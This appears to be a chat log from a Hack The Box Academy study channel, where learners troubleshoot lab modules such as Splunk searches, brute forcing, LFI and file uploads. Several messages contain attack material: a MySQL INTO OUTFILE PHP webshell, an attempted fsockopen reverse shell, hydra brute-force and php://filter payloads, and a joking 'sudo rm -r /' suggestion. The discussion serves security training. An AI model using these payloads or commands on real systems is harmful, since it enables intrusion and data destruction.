seriously someone needs to talk to htb about their security practice these boxes are horrible
ye but it said print current directory
i was a bit skeptical if it was cd
even though i used it and nothing happened in console
yeah idk
i did cd and the answer was correct
but like in console (through linux) it did this
and i got hella confused
Cd just goes to home
man idk idk
im still confused but hey i finished that part so onto the next one
yeah but how was that the correct answer
thats whats like confusing me
introduction to windows command line
page 4 system navigation
ah it's just dumb
see?
i forgot cd works different in windows
That is correct
lol
our original context was thinking it was linux
yeah i also kinda forgot
i got used to linux ngl
although you can still see the current path youre in...
naw i thought it was windows lol. pwd is still correct
cd in linux sends you home without a variable
yup
pwd is still correct, but the hint points to cd
alongside that, that's what's talked about in this section
if thats windows then pwd isnt a cmd anyway
yeah it was correct
that would make more sense
pwd isn't mentioned
mmmm in a cmdprompt its not a recognised cmd....
for some reason i recall already trying cd but it was wrong
holy shit dude i might have insomnia
windows equivalent is cd to linux pwd
probably had an extra space
yeah perhaps
hey just a quick question did u already passed web exploitation expert path ?
how many paths have u already completed
?
RAAAAAHHH
that Medium difficulty kinda scares me
yk? like im still in fundamentals and easy, still struggling a bit
it's actually not, just make sure you do your own research on each module and always keep notes, and it will be an easy win, trust me
should be fun
yeah for now sure
for now? aw hell nah how bad things are gonna get dude
your basics should be clear and each module will help you with that for sure, but you have to harden your concepts; if you don't, even a Fundamentals module will be hectic
yes ofc
best of luck 
there is only God not luck
oh.. so may Christ be with you on this hard journey
Only a few people have completed this path so far
have u ?
not yet
ig you've already completed the other 3 right ?
2 questions,
how can you have read/write without having change permission
and why is the permissions called modify if you don't have the change permission
Yes, I have completed all other paths
sounds like you're slacking a bit then
the cwee modules i've done so far have been a lot of fun
With read/write you can read and write files, but not delete them
C# is killing me
That's just so cool jbh
But you could just delete all the files contents right?
You should first try it on your Linux try sudo rm -r /
yes, but the file remains
also u forgor the f
**
I'm stupid, I just googled it and immediately found the answer, sorry chat
Hi im new in here and in htb in general
the problem is I cannot finish the first task in htb red team due to not being able to connect with OpenVPN
if i could get some help ill be grateful
Could you specify what have you tried?
do you have the openvpn file downloaded?
yes
but i have wsl so i cannot open the kali linux downloads folder to install it
You're in WSL?
yes
I wouldn't recommend
I have win kex for the gui
but im not able to put the openvpn file in the downloads in kali
you really should strongly consider not using wsl. not many here will be able to help you because almost no one uses it, if anyone.
had C# in high school and college as main lang. i dont like it 
shit
guess I'll figure out a way
To start the vpn connection you need to run
sudo openvpn file_path
where the file_path is the path to the file / the name of the file if its in the current directory
Then look forward to the Advanced Deserialization Attacks module
if you're using wsl you might already be logged in as root so you might not need the sudo
but also it's possible that Windows could block you from doing this, so you'll have to run it as administrator, but I wouldn't recommend using OpenVPN on your main machine
json? hmm i think we had to work on bunch of ser/ des in college.
and no i dont look forward to 
Then this module should be easy for you.
Yes, json, xml and binary
i mean my skills in coding are like "why dis not work?"
proceeds to ask my best friend 
Idk i dont like coding anymore, and still coding one is different then exploiting, tho i never serilize a binary 
ON to UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK: Introduction To Splunk & SPL
Question:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data the account name with the highest amount of Kerberos authentication ticket requests. Enter it as your answer.
I am kinda new to splunk. Can anyone point out why SPL queries are not working??? Even those mentioned in the module are NOT providing any output
Any nudges???
Hello
Well, I know why it doesn't work. I'm just too stupid to hide it so that it gets through the filter
LOL, well if you ever have a question about C# pls dont ask me
good luck. ill need to first finish CPTS path before going into Advanced Deserialization Attacks module
I'll be sure to dm you all my questions
i can almost get a tier 3 module i have 2 choices but i cant decide one 1) Binary Fuzzing, 2) Advanced XSS and CSRF Exploitation, i need help choosing between them
choose 2nd one it;s the best
well it all depends on your interest tbh
ok i guess that makes sense binary fuzzing is good but less applicable i guess
what is wrong with this bruh
hello, for port forwading module why my proxy doesn't work ? https://academy.hackthebox.com/module/158/section/1431
it's a vm windows and i've open vpn
also with plink it doesn't work ...
Hi. I'm trying to do the Login Brute Forcing module on my own Kali machine. I'm on the Determine Login Parameters-section, where the tutorial shows using a combination of Foxy Proxy and Burp Suite to go through HTTP requests. My problem is; on my own machine, I cannot seem to find a switch to activate the Burp proxy in Foxy Proxy.
Like in this picture.
there is something definitely wrong
I know I could just use the pwnbox, but I want to be able to do this on my own machine.
you need to add it in options
open foxyproxy -> options -> add -> fill 127.0.0.1, 8080, name to burpsuite
Ok. I tried to do that, but probably did something wrong. I've never configured a proxy before. I added a test-proxy in options with name 127.0.0.1 and 8080, but burp still don't show up in my Foxy Proxy
did you save it
Also, when using that proxy I can't access any websites on my chromium browser, I just get "This site can't be reached error"
aaah
maybe just use this open browser and do
Now I got it, thanks a lot
this section in windows attacks and defense is absolutely broken pls fix it
Anyone?
Any CDSA aspiring/completed guys?
dont specify sourcetype
make sure u specify the time to last 25 years/All Time
on the right side of the query
i did that module yesterday there was some problem with sysmon, just dont specify it
Thanks @candid lily @inland shoal
I will try again
why is this not being accepted
ohh from my target** nvm
any idea how to make dig use tcp
bruhhh
instead of .htb i was using .com
Intrusion Detection With Splunk (Real-world Scenario)
Q3 - Find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe
I've been on this for days now. Filtering for clr.dll, trying to find unknown call traces, event code 10s, stats count by target image and countless other variations of what's given in the module , and still coming up with nothing. Lost count of how many .exes I've tried to enter in the answer. How am I so far off with this one ? Hints or DMs appreciated.
for the digital forensics module, does the result download take awhile
ive been stuck here for 1 hour, fk rdp
Can anybody explain to me how I should read this thing? I tried going the microsoft page where they put this diagram but I can understand where do I start to read it
the download is ready. you have to click the name of the download
omg LOL
thanks a lot man, tfw the module didnt even show the file there
Hi bros, I'm stuck in the LOGIN BRUTE FORCING - Skills Assessment second question: "Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag." Could you help me out?
I already have the other user and I have the list that is in the home (rockyou-30.txt). My question is how do I brute force from there which port should I use? I tried hydra -l useretc -P rockyou ... ftp: //127.0.0.1 -t4. Or what IP and port should the attack launch? All my attempts mark my connection refused.
there seems to be a space in your ftp://127.0.0.1
I deleted the space, still the same no result, no password cracked out
I have some queries about uploading php reverse shells using mysql.
I am able to obtain a webshell using SELECT "<?php echo system($_GET['cmd']);?>" INTO OUTFILE '<directory>'; and execute it. However, when I try more complex things like SELECT "<?php -r "$sock=fsockopen("<ip address>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");"?>" INTO OUTFILE '<directory>', I run into syntax errors while saving the file, as well as when executing the webpage.
Is it not possible to upload a reverse shell using mysql? I can't seem to find much about this online
It's because of thr quotes brother
Being honest anything involving multiple quote sets just won't work
are you in the same dir as the rockyou?
I've been adjusting the quotes, its either I encounter syntax error while trying to upload using mysql, or being unable to execute it from the webpage. I guess I'll stick to the webshell then
Webshell and reading directly from sql are the only intended methods
It's solved, it seems that my VPN network just disconnected
Thanks, bro.
got it, thanks!
Modules: Password attack
section: Credential Hunting in Linux
so after not finding anything i started bruteforcing the FTP service. i left it running for around 3 hours now but nothing (for some reason it does 1 request per 10 sec LOL). Checked the Hint || They provide us with the creds for K***, but the mentioned password isnt in password.list, though it is in rockyou.txt. am i missing something obvious? how did we know there is a K account there? is it really intended to wait hours for the bruteforcing to finish? ||
I believe you access the linux host in another section. This is one where enumerating /home/ is important
But also, yes the password and it's mutation is in the provided list and subsequent mutated list
yea i remember seeing Kira in one of the other hosts. i think there was Sam, kira and idk what third user was
You can also manually adjust ftp threads
I also hope you're using lowercase k*
Because on a linux host, it matters
Also save found passwords
This module loves to reuse creds throughout
The Linux and Windows hosts are the same throughout
Also the hint doesn't give you a password rather, it gives you a suggestion to narrow your mutations down
The mutated list, I can guarantee, has the pw for them
yes ofc i am, its linux,
yea well i saw the K*** user in one of the other ones and i think it was Attacking Sam, but not 100%...
yea fair, a bit annoying tho, dont think i would think about the user at all, since its a new section
Bruteforcing with rock you is like cutting grass with scissors
i know
They keep it the same because it makes it easier
They don't need 20 hosts with a slightly different configuration
The only separate entities are the skill exams
yea i understand that, but taking an enumeration from a prev section
It's something I've said multiple times in this channel to do
¯\_(ツ)_/¯
My tip, check /home/ or C:\Users\ for usernames, save those to their own userlist, and use those for bruteforcing
well i tend to not read many messages about my upcoming modules, since i dont want spoilers 
not really a spoiler ¯\_(ツ)_/¯
ok will do that from now on
having a separate user list for each module
The module provides you one btw
It's just a bunch of extra names including the valid ones
well username.list gives you the name yea but you dont really know if its valid untill you get a password hit
unless you come to the conclusion that you saw it a few sections before
¯\_(ツ)_/¯
ty for the tip Marcie
just mutated it and got a hit...
Always start small go big
Use the smallest known list, even if it's a guess
I know I generally say don't make assumptions, but validating guesswork isn't an assumption
I'd rather use a list of like 5 users to iterate over a large list than 100
Also another tip, I forget the flag for it, but there's a flag in hydra that allows you to iterate over users instead of passwords in a list
So instead of user1 -> whole list it goes password1 -> userlist
Which can be faster
You almost never have to wait more than I would say 30 minutes or so for bruteforcing a module section
yea i started first with only will, then after nothing i had like a few others, but no k. i think it's the first module that reuses users etc, so will keep in mind from now on
ayy okey thats good
i went shopping and was like sure why not leave it running 
-> target died
PS C:\Users\netadm> net group "Domain Admins" /dom
Administrator netadm
type c:\Users\Administrator\Desktop\DnsAdmins\flag.txt
Access is denied
Hello. I can't get a flag with admin rights. Why?!
-t 48 is the most stable thread count fwiw
yep ty
maybe bc u not admin?
It helps us to help you if you provide the module and section you're working on
Dns Admins
That... doesn't help
Module: windows privilege escalation
Section: dns admins
sry, i am hurrying up to figure out my mistake...
Well have patience someone that's done the module might be able to offer more insights
Okay, finally. This module sucks as it REALLY depends on the right payload. I need to remember:
- not sc, SC.EXE!!!!
- payload for windows x64
- reset after each attempt
¯\_(ツ)_/¯
Generally when working with LoLbin stuff you gotta use the .exe extension
Hello
anyone setup 2FA on their HTB account?
I have some QR it asks me to scan, but it doesnt do anything, like I get a link I cant visit. how do I setup 2FA? can someone please help?
scan it with your 2FA mobile app
Okay. thanks. I will try this
google authenticator? thats the one on playstore
aight it worked. thanks
Why is my academy page showing "diablo says..." on the tab?
It alternates between that and the regular title
It's doing it on my Windows machine chrome browser too.
The other one was firefox on my Kali VM.
Never mind, it looks like there was a message in the chat function from someone on support named Diablo. It was kind of hidden, had to look for a minute to find it.
On the LFI Skills Assessment I'm noticing something that wasn't covered in the module.
I was able to find a hidden admin page (using "hidden_admin" instead of real name to avoid spoiler)
http://<ip>/hidden_admin/index.php
But in order to view the source of that I have to put the "hidden_admin" portion after the page=, even though it wouldn't be in place of the index.php page like shown below:
view-source:http://<ip>/index.php?page=php://filter/convert.base64-encode/resource=hidden_admin/index
The reason I ask is because when I put
http://<ip>/index.php?page=hidden_admin/index.php
I definitely don't get the same page as
http://<ip>/hidden_admin/index.php
Seems like something here is wrong, but it checks out with the walkthrough so far. I haven't converted the base64 yet because I'm still trying to figure out what is going on.
and why on the next step is index.php?log= working instead of index.php?logs=, the source code had it as plural
not sure what you're on about but everything in the skill assessment was in the module
I'm just confused on why the syntax is out of order on the webpage, but I kind of get it now, it's for the purposes of the lab
What I don't get is why index.php?log= is working instead of index.php?logs= for the next portion of the assessment
I don't want to post anything specific, but when reading the backend server file, it should be "logs" based on the source code
It should be logs/ and not log= also
not according to what i saw
Here's just the portion I saw so that I'm not giving spoilers
that's the folder where the logs are saved, not the parameter on the endpoint
it's the endpoint parameter that's vulnerable that you exploit
Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer?
Working on file uploads assessment and think I'm right on the edge of getting it. When I try to run commands through my upload this is all I'm getting back. Anyone want to give me a hint in the right direction?
Hard to say without seeing your payload, you can DM me if you want
I'll DM. Tried to keep it spoiler free on here.
Showing me there TCP and UDP closed domain and showing hash
You will probably get better help if you mention what module and section you're on
Has anyone taken the AD Trusts module? I have noticed the environment is slow and errors out often just wondering if anyone else had these issues.
Nmap
I did a couple sections, yeah it was slow. i also had to put my rdp timeout up to like 100000 to get it to connect
Nmap scripting engine
which VPN server were us using just curious if one was worse
US West
that's pwnbox region
VPN server is like us-academy-{1,2,3} or eu-academy-{1,2}
Hi Peeps, I'm working through the CPTS and have run into a problem. A command wasn't working when I connect through OpenVPN on my Kali Linux machine, but worked fine when I use Pwnbox. Is this a known issue? Is it worth buying a subscription to avoid this issue?
ahh then i'm us 3 i think
you mean the CPTS pathway?
yep
you have to be careful with wording
I generally haven't run into too many issues re: running a command on my machine and it not working on mine, but working on the pwnbox
just be mindful - the course was designed to be completable with the pwnbox
for file upload attacks - upload exploitation, can someone explain to me the php and shell code sections here
noted, thank you
but it's 100% doable with your VM and VPN, buying a sub does NOT change anything
1: you're sharing something from the walk-through so idk how HTB views that
2: google what the $_REQUEST parameter in php is
specifically regarding system()
i understand the command
i dont understand the php vs the shell section here
why is the shell given here
there is no shell
in screenshot it says Code: shell